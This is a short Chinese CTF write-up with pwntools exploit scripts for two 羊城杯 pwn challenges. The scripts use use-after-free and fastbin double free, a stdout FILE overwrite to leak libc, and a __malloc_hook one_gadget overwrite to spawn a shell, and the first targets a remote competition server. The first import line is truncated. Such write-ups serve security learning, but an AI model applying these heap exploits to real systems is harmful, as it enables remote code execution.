羊城杯

签到

简单的uaf

rom pwn import *
context.terminal = ['tmux', 'splitw', '-h']
#p=process('./sg')
p=remote('183.129.189.60',10029)
elf=ELF('./sg')
libc=elf.libc

def add(size,name,mess):
	p.sendlineafter(': ','1')
	p.sendlineafter(':',str(size))
	p.sendlineafter(':',name)
	p.sendlineafter(':',mess)

def show():
	p.sendlineafter(': ','2')
	#p.sendlineafter(':',str(idx))

def delete(idx):
	p.sendlineafter(': ','3')
	p.sendlineafter(':',str(idx))

add(0x28,'doudou2','doudou')
add(0x68,'doudou1','doudou1')
#add(0x98,'doudou','doudou')
#add(0x18,'dd','aa')
delete(0)
add(0x98,'doudou3','doudou3')
add(0x28,'doudou4','doudou4')
delete(2)
delete(3)
delete(0)
show()
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x3c4b78
system=libcbase+libc.sym['system']
malloc_hook=libcbase+libc.sym['__malloc_hook']
one_gadget=libcbase+0xf1207
add(0x68,'doudou5','doudou6')#4
#add(0x68,'doduou6','doudou7')#5
delete(1)
delete(4)
delete(1)
add(0x68,p64(malloc_hook-0x23),'dddd')
add(0x68,'aa','aa')
add(0x68,'aa','doudou')
add(0x68,'a'*19+p64(one_gadget),'doudou')
log.success('libcbase:  '+hex(libcbase))
p.sendlineafter(': ','1')
p.interactive()

babypwn

通过scanf函数触发malloc申请一个largebin大小的chunk会将fastbin的trunk放入unsortbin然后切申请堆块，double free写IO泄漏libc，之后就是正常攻击了大师傅的脚本(改动了一下
到了这一步，说明需要分配的是一块大的内存，或者 small bins 中找不到合适的 chunk。于是，ptmalloc 首先会遍历 fast bins 中的 chunk，将相邻的 chunk 进行合并， 并链接到 unsorted bin 中，

from pwn import *
context.log_level = 'DEBUG'
#context.terminal=['tmux','splite','-h']
context.terminal = ['tmux', 'splitw', '-h']
p=0
def pwn():
	global p
	def menu(ch):
		p.sendlineafter('choice :',str(ch))

	def new(size,name,content,sign=1):
		menu(1)
		p.sendlineafter("game's name:",str(size))
		p.sendafter("game's name:",name)
		if sign:
			p.sendlineafter("game's message:",content)
		else:
			p.sendline(content)
	def free(index):
		menu(2)
		p.sendlineafter('index:',str(index))


	p=process('./babypwn')
	elf=ELF('./babypwn')
	libc=elf.libc
	new(0x28,'doudou','aaa')#0
	new(0x68,'doudou2','bbb')#1
	new(0x68,'doudou3','cccc')#2
	new(0x68,'doudou4','ffff')
	free(2)
	menu(1)
	p.sendlineafter("game's name:",'0'*0x500)
	free(0)
	new(0x68,'\xDD\x25','aaa')
	free(1)
	free(3)
	free(1)
	new(0x68,'\x30','aaa')
	new(0x68,'dd','dd')
	new(0x68,'dd','dd')
	new(0x68,'dd','dd')
	menu(1)
	p.sendlineafter("game's name:",str(0x68))
	p.sendafter("game's name:",'\x00'*0x33 + p64(0xFBAD1800) + p64(0)*3 + '\x88')
#	p.sendlineafter("game's message:",'123123')
	libcbase=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')-0x3c48e0
	log.success('libcbase: '+hex(libcbase))
	malloc_hook=libcbase+libc.sym['__malloc_hook']
	one_gadget=libcbase+0xf1207
#	free(1)
	realloc=libcbase+libc.sym['__libc_realloc']
	p.sendlineafter("game's message:",'123123')
	free(1)
	free(3)
	free(1)
	new(0x68,p64(malloc_hook-0x23),'aaaa')
	new(0x68,'dd','dd')
	new(0x68,'dd','dd')
	new(0x68,'a'*11+p64(one_gadget)+p64(realloc+4),'ccc')
	p.interactive()
	return True

if __name__=="__main__":
	while 1:
		try:
			if pwn()==True:
				break
		except Exception as e:
			p.close()
			continue